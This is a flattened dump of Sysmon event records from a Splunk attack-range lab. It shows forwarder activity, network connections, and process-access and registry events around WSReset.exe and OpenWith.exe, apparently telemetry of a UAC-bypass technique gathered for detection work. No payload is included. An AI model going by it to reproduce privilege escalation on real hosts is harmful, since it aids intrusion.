AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7337C17B107A9B9420E569A736403EB8,SHA256=4784E24BE320674EA6CC99DE7057CD9BD46A46AD306C59AC29C0D729630387E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:58.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F69112CE910E4E8E15EA3A2C121B5A3,SHA256=023F5EF141D29D00C7DCB0B8BD4FAAEED72D35137F6654FD27C8F7E2B77804E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:58.378{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57440-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:59.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B87BCD8849D34F017C4B1493412F57,SHA256=04506B911971F8A9801FF5855A5757F054E883183F351E7E058BBF98E0C89CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.841{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=14F941B9B9BA1D6958F200F66B9DF629,SHA256=36C47F8A4AEBF1E113AD8E002AC849E97B314AE84DB679E45565D53EA3D0A21E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.818{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61941-false10.0.1.12-8089- 10341000x80000000000000001054169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.165{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.164{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.164{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.073{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.057{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.038{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.035{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.035{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.004{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.003{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000001054153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:05:58.988{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFFBinary Data 23542300x8000000000000000810047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:00.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB679D190438994B7A725346B9182E2,SHA256=CE9B498170A359CDBF0FFC779C7D908995C12CE24B9E3DBA570AF4471B9E49CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.661{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=0B7A84FDCDCDAFBF8BB1D94C4BCE4E07,SHA256=CFEC39E59D53BF82CE53AAAC9C6B3CCDD0FFF720001086D2CAA374648B23D9DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.588{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61942-false10.0.1.12-8000- 23542300x80000000000000001054174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2710B355ACF1566F5215F3D2D5D5AB07,SHA256=E73E535AE6985E9B5D5D712B513D0575968083D676561460F822A56A0C307F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B72FC21FE54C42785E04F30F96A5834,SHA256=694F4D398076F12D504789964DF5E7EA8279BA4660110955108B5F71720D648B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F5CC56C17CC11442EC9E931CDF9F7C1,SHA256=B39EDA0527259399F987A06F98DBAA3D31C2EDB883A5125A0630078FDD9C848B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:01.190{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67CB421343837BCBC1E84F1FD5389DEB,SHA256=975514B80EC3099BF2360B68C75E85382250FF729EC3DC8380D4D83AE0A29E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:01.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B637CBF556F7F73617771A0260F038,SHA256=D8A43B65D064FBFFA934B1FB5D7F6991F56993BA66A41D6DA92E8D3E17F75042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:02.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A76EC07E891C5E9B9F2F088F5475A83,SHA256=3B826D22E563B9E003E2EB90F8932B4D6E1BC5CDF61BA90C59FF2AB4955004CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:02.278{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34AF4A545238C0CE372593F077074BC,SHA256=132B9424CAF2C71F0A4096A0FDD83A7F010EBA031D9F9A085858C4501D5C2A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.035{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com57551-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:03.293{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5E6239416738607D39877D39C0CD26,SHA256=07236FEC9380644F2A0C317E73EF61A450E1632F0E1C9B633A533833259FB3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:03.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBEB7068A4B2577B9DE9C7581993477B,SHA256=7F44EC6D56DC1272F02EECEFA1C864DF3230FB07D68CED456AFC075006C25F43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2710B355ACF1566F5215F3D2D5D5AB07,SHA256=E73E535AE6985E9B5D5D712B513D0575968083D676561460F822A56A0C307F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5A6619B1CD1782424E8FB9D288AAC7F3,SHA256=E45ECB5D862BB397A15FE6B6257D8F9C1E44AF4C176EED73A2FB8BC376D3C2EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1648EA061505663F981A367A0EDDA917,SHA256=A596509B11D7AF1263986C951CE36BA9A866B821703586A206E04D5655756C2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:03.404{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57441-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000810061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6eb096) 13241300x8000000000000000810059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x60c940d5) 13241300x8000000000000000810058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0xc28da8d5) 13241300x8000000000000000810057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 